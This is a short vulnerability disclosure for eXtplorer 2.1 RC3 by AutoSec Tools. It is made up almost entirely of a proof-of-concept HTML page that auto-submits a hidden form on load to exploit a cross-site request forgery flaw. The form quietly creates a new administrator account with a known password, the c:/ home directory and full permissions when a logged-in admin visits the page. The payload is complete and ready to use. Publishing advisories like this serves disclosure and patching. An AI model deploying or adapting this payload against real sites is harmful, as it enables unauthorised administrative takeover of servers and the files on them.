<!------------------------------------------------------------------------ # Software................eXtplorer 2.1 RC3 # Vulnerability...........Cross-site Request Forgery # Threat Level............Low (1/5) # Download................http://extplorer.sourceforge.net/ # Discovery Date..........4/5/2011 # Tested On...............Windows Vista + XAMPP # ------------------------------------------------------------------------ # Author..................AutoSec Tools # Site....................http://www.autosectools.com/ # Email...................John Leitch <john@autosectools.com> # ------------------------------------------------------------------------ # # # --Description-- # # A cross-site request forgery vulnerability in eXtplorer 2.1 RC3 can be # exploited to create a new admin. # # # --PoC--> <html> <body onload="document.forms[0].submit()"> <form method="POST" action="http://localhost/extplorer/index.php"> <input type="hidden" name="option" value="com_extplorer" /> <input type="hidden" name="user" value="" /> <input type="hidden" name="action" value="admin" /> <input type="hidden" name="action2" value="adduser" /> <input type="hidden" name="confirm" value="true" /> <input type="hidden" name="nuser" value="new_admin" /> <input type="hidden" name="pass1" value="Password1" /> <input type="hidden" name="pass2" value="Password1" /> <input type="hidden" name="home_dir" value="c:/" /> <input type="hidden" name="home_url" value="http://localhost" /> <input type="hidden" name="show_hidden" value="1" /> <input type="hidden" name="no_access" value="" /> <input type="hidden" name="permissions" value="7" /> <input type="hidden" name="active" value="1" /> </form> </body> </html>